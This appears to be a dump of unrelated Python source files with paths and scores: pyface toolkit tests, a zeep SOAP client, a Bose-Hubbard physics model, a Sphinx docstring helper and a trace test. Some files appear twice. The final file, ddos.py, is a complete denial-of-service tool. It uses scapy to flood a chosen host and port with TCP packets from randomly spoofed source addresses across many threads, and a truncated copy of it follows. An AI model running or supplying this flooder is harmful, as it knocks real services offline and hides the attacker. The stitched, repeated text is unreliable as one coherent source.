# test that the Toolkit class works when object not overridden
toolkit_object = pyface.toolkit.toolkit_object
TestWindow = toolkit_object('window:Window')
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Window = toolkit_object('window:Window')
self.assertEqual(Window, TestWindow)
finally:
toolkit_object.packages = old_packages | Latest/venv/Lib/site-packages/pyface/tests/test_toolkit.py | import pkg_resources
import unittest
import pyface.toolkit
class TestToolkit(unittest.TestCase):
def test_missing_import(self):
# test that we get an undefined object if no toolkit implementation
cls = pyface.toolkit.toolkit_object('tests:Missing')
with self.assertRaises(NotImplementedError):
obj = cls()
def test_bad_import(self):
# test that we don't filter unrelated import errors
with self.assertRaises(ImportError):
cls = pyface.toolkit.toolkit_object('tests.bad_import:Missing')
def test_core_plugins(self):
# test that we can see appropriate core entrypoints
plugins = set(entry_point.name for entry_point in
pkg_resources.iter_entry_points('pyface.toolkits'))
self.assertLessEqual({'qt4', 'wx', 'qt', 'null'}, plugins)
def test_toolkit_object(self):
# test that the Toolkit class works as expected
# note that if this fails many other things will too
from pyface.tests.test_new_toolkit.init import toolkit_object
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
def test_toolkit_object_overriden(self):
# test that the Toolkit class search paths can be overridden
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
toolkit_object = pyface.toolkit.toolkit_object
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
finally:
toolkit_object.packages = old_packages
def test_toolkit_object_not_overriden(self):
# test that the Toolkit class works when object not overridden
toolkit_object = pyface.toolkit.toolkit_object
TestWindow = toolkit_object('window:Window')
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Window = toolkit_object('window:Window')
self.assertEqual(Window, TestWindow)
finally:
toolkit_object.packages = old_packages | 0.433022 | 0.390883 |
from zeep import Client
c = Client('http://localhost:8000?wsdl')
def get_header():
return c.get_type('ns0:Header')(
Message_Type='mt',
Company_ID='ci',
Version='v',
Source='s',
Destination='d',
Action_Type='read',
Sequence_Number='1',
Batch_ID='bi',
Reference_ID='ri',
Msg_Locale='ml',
Msg_Time_Zone='mtz',
Internal_Date_Time_Stamp='idts'
)
def send_receive_item_bar_code():
message = c.get_type('ns0:Message')(
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemBarCode(tXml=tXml)
def send_receive_item_master():
message = c.get_type('ns0:Message')(
Item=c.get_type('ns0:Item')(
ItemCode='ic',
IsStyle='is',
ActionType='at',
ActivationDate='ad',
TargetExclusive='te',
OnlineExclusive='oe',
EssentialItem='ei',
LongDescription='ld',
ShortDescription='sd',
PrimaryBarcode='pb',
HazmatCode='hc',
BulkyItem='bi',
ItemWeight='iw',
ItemHeight='ih',
ItemLength='il',
ItemWidth='iw',
ItemVolume='iv',
WeightUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPerishable='ip',
ItemPackageList=c.get_type('ns0:ItemPackageList')(
ItemPackage=[
c.get_type('ns0:ItemPackage')(
PackageType='pt',
Description='d',
Quantity='q',
UnitWeight='uw',
UnitWidth='uw',
UnitLength='ul',
UnitHeight='uh',
UnitVolume='uv',
WeigthUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPrimary='ip',
BusinessPartnerNumber='bpn',
Ti='ti',
Hi='hi',
),
]
),
ProductHeirarchy=c.get_type('ns0:ProductHeirarchy')(
Variant='v',
Product='p',
MerchandiseStyle='ms',
Range='r',
MajorClass='mc',
ClassGroup='cg',
Department='d',
BusinessGroup='bg',
Section='s',
Company='c',
),
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
]
),
PerishableAttribute=c.get_type('ns0:PerishableAttribute')(
ShelfDays='sd',
ExpireDateReqd='edr',
MinReceivedToExpireDays='mrted',
MaxReceivedToExpireDays='mrted',
),
WarehouseAttributes=c.get_type('ns0:WarehouseAttributes')(
SecureProduct='sp',
Conveyable='c',
PutawayType='pt',
CrushCode='cc',
VolatilityCode='vc',
),
Slotting=[
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
],
ItemPromotion=c.get_type('ns0:ItemPromotion')(
OnPromo='op',
PromoStartWeek='psw',
),
ItemAttributes=[
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
],
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemMaster(tXml=tXml)
send_receive_item_bar_code()
send_receive_item_master() | util/client.py | from zeep import Client
c = Client('http://localhost:8000?wsdl')
def get_header():
return c.get_type('ns0:Header')(
Message_Type='mt',
Company_ID='ci',
Version='v',
Source='s',
Destination='d',
Action_Type='read',
Sequence_Number='1',
Batch_ID='bi',
Reference_ID='ri',
Msg_Locale='ml',
Msg_Time_Zone='mtz',
Internal_Date_Time_Stamp='idts'
)
def send_receive_item_bar_code():
message = c.get_type('ns0:Message')(
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemBarCode(tXml=tXml)
def send_receive_item_master():
message = c.get_type('ns0:Message')(
Item=c.get_type('ns0:Item')(
ItemCode='ic',
IsStyle='is',
ActionType='at',
ActivationDate='ad',
TargetExclusive='te',
OnlineExclusive='oe',
EssentialItem='ei',
LongDescription='ld',
ShortDescription='sd',
PrimaryBarcode='pb',
HazmatCode='hc',
BulkyItem='bi',
ItemWeight='iw',
ItemHeight='ih',
ItemLength='il',
ItemWidth='iw',
ItemVolume='iv',
WeightUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPerishable='ip',
ItemPackageList=c.get_type('ns0:ItemPackageList')(
ItemPackage=[
c.get_type('ns0:ItemPackage')(
PackageType='pt',
Description='d',
Quantity='q',
UnitWeight='uw',
UnitWidth='uw',
UnitLength='ul',
UnitHeight='uh',
UnitVolume='uv',
WeigthUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPrimary='ip',
BusinessPartnerNumber='bpn',
Ti='ti',
Hi='hi',
),
]
),
ProductHeirarchy=c.get_type('ns0:ProductHeirarchy')(
Variant='v',
Product='p',
MerchandiseStyle='ms',
Range='r',
MajorClass='mc',
ClassGroup='cg',
Department='d',
BusinessGroup='bg',
Section='s',
Company='c',
),
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
]
),
PerishableAttribute=c.get_type('ns0:PerishableAttribute')(
ShelfDays='sd',
ExpireDateReqd='edr',
MinReceivedToExpireDays='mrted',
MaxReceivedToExpireDays='mrted',
),
WarehouseAttributes=c.get_type('ns0:WarehouseAttributes')(
SecureProduct='sp',
Conveyable='c',
PutawayType='pt',
CrushCode='cc',
VolatilityCode='vc',
),
Slotting=[
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
],
ItemPromotion=c.get_type('ns0:ItemPromotion')(
OnPromo='op',
PromoStartWeek='psw',
),
ItemAttributes=[
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
],
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemMaster(tXml=tXml)
send_receive_item_bar_code()
send_receive_item_master() | 0.493897 | 0.089137 |
from typing import List
import numpy
from mlxtk import dvr
from mlxtk.log import get_logger
from mlxtk.parameters import Parameters
from mlxtk.tasks import MBOperatorSpecification, OperatorSpecification
class BoseHubbard:
def __init__(self, parameters: Parameters):
self.parameters = parameters
self.grid = dvr.add_sinedvr(parameters.sites, 0, parameters.sites - 1)
self.logger = get_logger(__name__ + ".BoseHubbard")
@staticmethod
def create_parameters() -> Parameters:
return Parameters(
[
("sites", 4, "number of sites"),
("N", 4, "number of particles"),
("m", 4, "number of SPFs"),
("J", 1.0, "hopping constant"),
("U", 1.0, "interaction strength"),
("pbc", True, "whether to use periodic boundary conditions"),
]
)
def create_hopping_term(self) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
for i in range(self.parameters.sites - 1):
matrix[i, i + 1] = 1.0
matrix[i + 1, i] = 1.0
if self.parameters.pbc:
matrix[0, -1] = 1.0
matrix[-1, 0] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{
"hopping_coeff": -self.parameters.J,
},
{"hopping": matrix},
"hopping_coeff | 1 hopping",
)
def create_correlator(self, site_a: int, site_b: int) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
matrix[site_a, site_b] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{"correlator_coeff": 1.0},
{"correlator": matrix},
"correlator_coeff | 1 correlator",
)
def create_interaction_term(self) -> MBOperatorSpecification:
def create_delta_peak(n: int, i: int) -> numpy.ndarray:
result = numpy.zeros(n)
result[i] = 1.0
return result
n = self.grid.get().npoints
return MBOperatorSpecification(
(1,),
(self.grid,),
{"interaction_coeff": self.parameters.U},
{f"interaction_term_{i}": create_delta_peak(n, i) for i in range(n)},
[
"interaction_coeff | 1 interaction_term_{} | 1* interaction_term_{}".format(
i, i
)
for i in range(n)
],
)
def get_site_occupation_operator(self, site_index: int) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff": 1.0},
{"site_occupation": term},
"site_occupation_coeff | 1 site_occupation",
)
def get_site_occupation_operator_squared(
self, site_index: int
) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff_1": 1.0, "site_occupation_coeff_2": 2.0},
{"site_occupation": term},
[
"site_occupation_coeff_1 | 1 site_occupation",
"site_occupation_coeff_2 | 1 site_occupation | 1* site_occupation",
],
)
def get_site_occupation_pair_operator(
self, site_index_1: int, site_index_2: int
) -> MBOperatorSpecification:
n = self.grid.get().npoints
term_1 = numpy.zeros(n)
term_1[site_index_1] = 1
term_2 = numpy.zeros(n)
term_2[site_index_2] = 1
terms = {"site_occupation_pair_1": term_1, "site_occupation_pair_2": term_2}
coefficients = {"site_occupation_pair_2b_coeff": 2.0}
table = [
"site_occupation_pair_2b_coeff | 1 site_occupation_pair_1 | 1* site_occupation_pair_2"
]
if site_index_1 == site_index_2:
coefficients["site_occupation_pair_1b_coeff"] = 1.0
table.append("site_occupation_pair_1b_coeff | 1 site_occupation_pair_1")
return MBOperatorSpecification((1,), (self.grid,), coefficients, terms, table)
def get_hamiltonian(self) -> MBOperatorSpecification:
terms: List[MBOperatorSpecification] = []
if self.parameters.J != 0.0:
terms.append(self.create_hopping_term())
if self.parameters.U != 0.0:
terms.append(self.create_interaction_term())
if terms is None:
raise RuntimeError("Hamiltonian would be empty since both J and U are 0.0")
operator = terms[0]
for term in terms[1:]:
operator += term
return operator
def get_fake_initial_state_hamiltonian(self) -> OperatorSpecification:
n = self.grid.get().npoints
mat = numpy.zeros((n, n), dtype=numpy.float64)
for i in range(n):
mat[i, i] = i
return OperatorSpecification(
(self.grid,),
{
"coeff": 1,
},
{
"matrix": mat,
},
"coeff | 1 matrix",
)
def distribute_particles(self) -> numpy.ndarray:
ns = numpy.zeros(self.parameters.m)
loc = 0
for _ in range(self.parameters.N):
ns[loc] += 1
loc = (loc + 1) % self.parameters.m
assert numpy.sum(ns) == self.parameters.N
return ns | mlxtk/systems/single_species/bose_hubbard.py | from typing import List
import numpy
from mlxtk import dvr
from mlxtk.log import get_logger
from mlxtk.parameters import Parameters
from mlxtk.tasks import MBOperatorSpecification, OperatorSpecification
class BoseHubbard:
def __init__(self, parameters: Parameters):
self.parameters = parameters
self.grid = dvr.add_sinedvr(parameters.sites, 0, parameters.sites - 1)
self.logger = get_logger(__name__ + ".BoseHubbard")
@staticmethod
def create_parameters() -> Parameters:
return Parameters(
[
("sites", 4, "number of sites"),
("N", 4, "number of particles"),
("m", 4, "number of SPFs"),
("J", 1.0, "hopping constant"),
("U", 1.0, "interaction strength"),
("pbc", True, "whether to use periodic boundary conditions"),
]
)
def create_hopping_term(self) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
for i in range(self.parameters.sites - 1):
matrix[i, i + 1] = 1.0
matrix[i + 1, i] = 1.0
if self.parameters.pbc:
matrix[0, -1] = 1.0
matrix[-1, 0] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{
"hopping_coeff": -self.parameters.J,
},
{"hopping": matrix},
"hopping_coeff | 1 hopping",
)
def create_correlator(self, site_a: int, site_b: int) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
matrix[site_a, site_b] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{"correlator_coeff": 1.0},
{"correlator": matrix},
"correlator_coeff | 1 correlator",
)
def create_interaction_term(self) -> MBOperatorSpecification:
def create_delta_peak(n: int, i: int) -> numpy.ndarray:
result = numpy.zeros(n)
result[i] = 1.0
return result
n = self.grid.get().npoints
return MBOperatorSpecification(
(1,),
(self.grid,),
{"interaction_coeff": self.parameters.U},
{f"interaction_term_{i}": create_delta_peak(n, i) for i in range(n)},
[
"interaction_coeff | 1 interaction_term_{} | 1* interaction_term_{}".format(
i, i
)
for i in range(n)
],
)
def get_site_occupation_operator(self, site_index: int) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff": 1.0},
{"site_occupation": term},
"site_occupation_coeff | 1 site_occupation",
)
def get_site_occupation_operator_squared(
self, site_index: int
) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff_1": 1.0, "site_occupation_coeff_2": 2.0},
{"site_occupation": term},
[
"site_occupation_coeff_1 | 1 site_occupation",
"site_occupation_coeff_2 | 1 site_occupation | 1* site_occupation",
],
)
def get_site_occupation_pair_operator(
self, site_index_1: int, site_index_2: int
) -> MBOperatorSpecification:
n = self.grid.get().npoints
term_1 = numpy.zeros(n)
term_1[site_index_1] = 1
term_2 = numpy.zeros(n)
term_2[site_index_2] = 1
terms = {"site_occupation_pair_1": term_1, "site_occupation_pair_2": term_2}
coefficients = {"site_occupation_pair_2b_coeff": 2.0}
table = [
"site_occupation_pair_2b_coeff | 1 site_occupation_pair_1 | 1* site_occupation_pair_2"
]
if site_index_1 == site_index_2:
coefficients["site_occupation_pair_1b_coeff"] = 1.0
table.append("site_occupation_pair_1b_coeff | 1 site_occupation_pair_1")
return MBOperatorSpecification((1,), (self.grid,), coefficients, terms, table)
def get_hamiltonian(self) -> MBOperatorSpecification:
terms: List[MBOperatorSpecification] = []
if self.parameters.J != 0.0:
terms.append(self.create_hopping_term())
if self.parameters.U != 0.0:
terms.append(self.create_interaction_term())
if terms is None:
raise RuntimeError("Hamiltonian would be empty since both J and U are 0.0")
operator = terms[0]
for term in terms[1:]:
operator += term
return operator
def get_fake_initial_state_hamiltonian(self) -> OperatorSpecification:
n = self.grid.get().npoints
mat = numpy.zeros((n, n), dtype=numpy.float64)
for i in range(n):
mat[i, i] = i
return OperatorSpecification(
(self.grid,),
{
"coeff": 1,
},
{
"matrix": mat,
},
"coeff | 1 matrix",
)
def distribute_particles(self) -> numpy.ndarray:
ns = numpy.zeros(self.parameters.m)
loc = 0
for _ in range(self.parameters.N):
ns[loc] += 1
loc = (loc + 1) % self.parameters.m
assert numpy.sum(ns) == self.parameters.N
return ns | 0.853776 | 0.55266 |
import importlib
import inspect
import pkgutil
import sys
def package_classes(package):
"""Get a list of classes in a package.
Return a list of qualified names of classes in the specified package. Classes in modules
with names beginning with an "_" are omitted, as are classes whose internal module name
record is not the same as the module in which they are found (i.e. indicating that they
have been imported from elsewhere).
Args:
package: Reference to package for which classes are to be listed (not package name
string)
"""
classes = []
# Iterate over modules in package
for importer, modname, _ in pkgutil.walk_packages(
path=package.__path__, prefix=(package.__name__ + "."), onerror=lambda x: None
):
# Skip modules whose names begin with a "_"
if modname.split(".")[-1][0] == "_":
continue
importlib.import_module(modname)
# Iterate over module members
for name, obj in inspect.getmembers(sys.modules[modname]):
if inspect.isclass(obj):
# Get internal module name of class for comparison with working module name
try:
objmodname = getattr(sys.modules[modname], obj.__name__).__module__
except Exception:
objmodname = None
if objmodname == modname:
classes.append(modname + "." + obj.__name__)
return classes
def insert_inheritance_diagram(clsqname):
"""Insert an inheritance diagram into a class docstring.
No action is taken for classes without a base clase, and for classes without a docstring.
Args:
clsqname: Qualified name (i.e. including module name path) of class
"""
# Extract module name and class name from qualified class name
clspth = clsqname.split(".")
modname = ".".join(clspth[0:-1])
clsname = clspth[-1]
# Get reference to class
cls = getattr(sys.modules[modname], clsname)
# Return immediately if class has no base classes
if getattr(cls, "__bases__") == (object,):
return
# Get current docstring
docstr = getattr(cls, "__doc__")
# Return immediately if class has no docstring
if docstr is None:
return
# Split docstring into individual lines
lines = docstr.splitlines()
# Return immediately if there are no lines
if not lines:
return
# Cut leading whitespace lines
n = 0
for n, line in enumerate(lines):
if line != "":
break
lines = lines[n:]
# Define inheritance diagram insertion text
idstr = (
"""
.. inheritance-diagram:: %s
:parts: 2
"""
% clsname
)
# Insert inheritance diagram after summary line and whitespace line following it
lines.insert(2, idstr)
# Construct new docstring and attach it to the class
extdocstr = "\n".join(lines)
setattr(cls, "__doc__", extdocstr) | docs/source/docutil.py | import importlib
import inspect
import pkgutil
import sys
def package_classes(package):
"""Get a list of classes in a package.
Return a list of qualified names of classes in the specified package. Classes in modules
with names beginning with an "_" are omitted, as are classes whose internal module name
record is not the same as the module in which they are found (i.e. indicating that they
have been imported from elsewhere).
Args:
package: Reference to package for which classes are to be listed (not package name
string)
"""
classes = []
# Iterate over modules in package
for importer, modname, _ in pkgutil.walk_packages(
path=package.__path__, prefix=(package.__name__ + "."), onerror=lambda x: None
):
# Skip modules whose names begin with a "_"
if modname.split(".")[-1][0] == "_":
continue
importlib.import_module(modname)
# Iterate over module members
for name, obj in inspect.getmembers(sys.modules[modname]):
if inspect.isclass(obj):
# Get internal module name of class for comparison with working module name
try:
objmodname = getattr(sys.modules[modname], obj.__name__).__module__
except Exception:
objmodname = None
if objmodname == modname:
classes.append(modname + "." + obj.__name__)
return classes
def insert_inheritance_diagram(clsqname):
"""Insert an inheritance diagram into a class docstring.
No action is taken for classes without a base clase, and for classes without a docstring.
Args:
clsqname: Qualified name (i.e. including module name path) of class
"""
# Extract module name and class name from qualified class name
clspth = clsqname.split(".")
modname = ".".join(clspth[0:-1])
clsname = clspth[-1]
# Get reference to class
cls = getattr(sys.modules[modname], clsname)
# Return immediately if class has no base classes
if getattr(cls, "__bases__") == (object,):
return
# Get current docstring
docstr = getattr(cls, "__doc__")
# Return immediately if class has no docstring
if docstr is None:
return
# Split docstring into individual lines
lines = docstr.splitlines()
# Return immediately if there are no lines
if not lines:
return
# Cut leading whitespace lines
n = 0
for n, line in enumerate(lines):
if line != "":
break
lines = lines[n:]
# Define inheritance diagram insertion text
idstr = (
"""
.. inheritance-diagram:: %s
:parts: 2
"""
% clsname
)
# Insert inheritance diagram after summary line and whitespace line following it
lines.insert(2, idstr)
# Construct new docstring and attach it to the class
extdocstr = "\n".join(lines)
setattr(cls, "__doc__", extdocstr) | 0.521959 | 0.328583 |
import trace
import os
import subprocess
import tempfile
import unittest
import shlex
import libutil
class TraceTest(unittest.TestCase):
def setUp(self):
# create a directory hierarchy to do tests in
self.test_data_dir = os.path.realpath(os.path.join(tempfile.gettempdir(), 'trace_test'))
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.system('mkdir %s' % self.test_data_dir)
def test_start_cold(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
self.assertEquals(os.path.join(self.test_data_dir, "trace", "trace"), trace1._executable)
self.assertEquals(os.path.join(self.test_data_dir, "trace.codes"), trace1.codes_file)
def test_start_warm(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
trace2 = trace.Trace(util, self.test_data_dir)
self.assertFalse(trace2.did_compile)
def test_call_mocked(self):
real_system = os.system
system_args = []
def mock_system(*args):
del system_args[:]
system_args.extend(args)
return 7
os.system = mock_system
try:
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
ret = trace1.call(["test"], sudo=False)
self.assertEquals(7, ret)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
ret = trace1.call(["test"], sudo=True)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
self.assertEquals(7, ret)
finally:
os.system = real_system
def system(self, cmd):
args = shlex.split(cmd)
p = subprocess.Popen(args,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p.communicate()
return p.returncode
def rm_rf(self, dirname):
self.system('rm -rf -- %s' % dirname)
def tearDown(self):
if self.test_data_dir:
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.test_data_dir = None | src/trace_test.py | import trace
import os
import subprocess
import tempfile
import unittest
import shlex
import libutil
class TraceTest(unittest.TestCase):
def setUp(self):
# create a directory hierarchy to do tests in
self.test_data_dir = os.path.realpath(os.path.join(tempfile.gettempdir(), 'trace_test'))
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.system('mkdir %s' % self.test_data_dir)
def test_start_cold(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
self.assertEquals(os.path.join(self.test_data_dir, "trace", "trace"), trace1._executable)
self.assertEquals(os.path.join(self.test_data_dir, "trace.codes"), trace1.codes_file)
def test_start_warm(self):
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
self.assertTrue(trace1.did_compile)
trace2 = trace.Trace(util, self.test_data_dir)
self.assertFalse(trace2.did_compile)
def test_call_mocked(self):
real_system = os.system
system_args = []
def mock_system(*args):
del system_args[:]
system_args.extend(args)
return 7
os.system = mock_system
try:
util = libutil.LibUtil(self.test_data_dir)
trace1 = trace.Trace(util, self.test_data_dir)
ret = trace1.call(["test"], sudo=False)
self.assertEquals(7, ret)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
ret = trace1.call(["test"], sudo=True)
self.assertEquals("%s test" % trace1._executable, system_args[-1])
self.assertEquals(7, ret)
finally:
os.system = real_system
def system(self, cmd):
args = shlex.split(cmd)
p = subprocess.Popen(args,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p.communicate()
return p.returncode
def rm_rf(self, dirname):
self.system('rm -rf -- %s' % dirname)
def tearDown(self):
if self.test_data_dir:
if os.path.exists(self.test_data_dir):
self.rm_rf(self.test_data_dir)
self.test_data_dir = None | 0.22414 | 0.33269 |
import random
from scapy.all import *
import threading
import socket
import sys
from urllib.parse import urlparse
import colors
import time
class DDoS(object):
def __init__(self, url, ip, start_port, end_port, dport, threads,
interval):
if url is not None and ip is not None:
colors.error('Please provide either the URL or the IP address...')
sys.exit(1)
if ip is not None:
self.target_ip = ip
elif url is not None:
self.target_ip = self.getIP(url)
else:
colors.error('Please provide URL or the IP address to attack...')
if start_port is not None:
if start_port > 0 and start_port < 65355:
self.start_port = int(start_port)
else:
self.start_port = random.randint(1, 100)
if end_port is not None:
if end_port > 1 and end_port < 65356:
self.end_port = int(end_port)
else:
self.end_port = random.randint(1000, 65355)
if dport is None:
self.dport = 80
else:
if dport < 65356 and dport > 0:
self.dport = int(dport)
else:
colors.error('Please provide a valid destination port')
sys.exit(1)
if interval is not None:
self.INTER = int(interval)
else:
self.INTER = 0.0001
if threads is not None:
threads = int(threads)
self.threadValidator(threads)
else:
self.threads = 1
self.number_of_packets = 0
def threadValidator(self, threads):
"""
Validates the number of threads
"""
if threads > 100:
choice = input('Are you sure you want to use {} threads...?'
'This can slow down your system.(Y/N)'
.format(threads))
if choice == 'N' or choice == 'n':
threads = int(input('>> Please enter the number of threads'
' you want to use...'))
self.threadValidator(threads)
else:
self.threads = threads
else:
self.threads = threads
@staticmethod
def getIP(url):
"""
Converts URL to IP
"""
url = urlparse(url)
return socket.gethostbyname(url.netloc)
@staticmethod
def generateIP():
"""
Generates random IP address
"""
ip = str(random.randint(1, 254)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255)) + '.'\
+ str(random.randint(0, 255))
return ip
def generatePacket(self, ip, source_port):
"""
Generates scapy packet
"""
IP_PACKET = IP(src=ip, dst=self.target_ip)
TCP_PACKET = TCP(sport=source_port, dport=self.dport)
PKT = IP_PACKET/TCP_PACKET
return PKT
def sendPacket(self, packet):
"""
Sends the generated packets to the destination
"""
send(packet, inter=self.INTER, verbose=False)
self.number_of_packets = self.number_of_packets + 1
print('[+] Packets sent : {}'.format(self.number_of_packets), end='\r')
def attack(self):
while True:
start_index = 0
ip = self.generateIP()
break_point = random.randint(1, 25)
for _ in range(self.start_port, self.end_port):
source_port = random.randint(self.start_port, self.end_port)
newPacket = self.generatePacket(ip, source_port)
self.sendPacket(newPacket)
start_index = start_index + 1
if start_index > break_point:
break
def startAttack(self):
try:
colors.info('DDoS Attack on : {} : {}'
.format(self.target_ip, self.dport))
colors.success('DDoS Attack started, press CTRL+C to stop...')
t1 = time.time()
threads = []
for _ in range(self.threads):
newThread = threading.Thread(target=self.attack)
threads.append(newThread)
newThread.start()
for thread in threads:
thread.join()
except KeyboardInterrupt:
t2 = time.time()
colors.success('Completed in time : {}'.format(t2-t1)) | src/lib/attacks/ddos/ddos.py |
import random
from scapy.all import *
import threading
import socket
import sys
from urllib.parse import urlparse
import colors
import time
class DDoS(object):
def __init__(self, url, ip, start_port, end_port, dport, threads,
interval):
if url is not None and ip is not None:
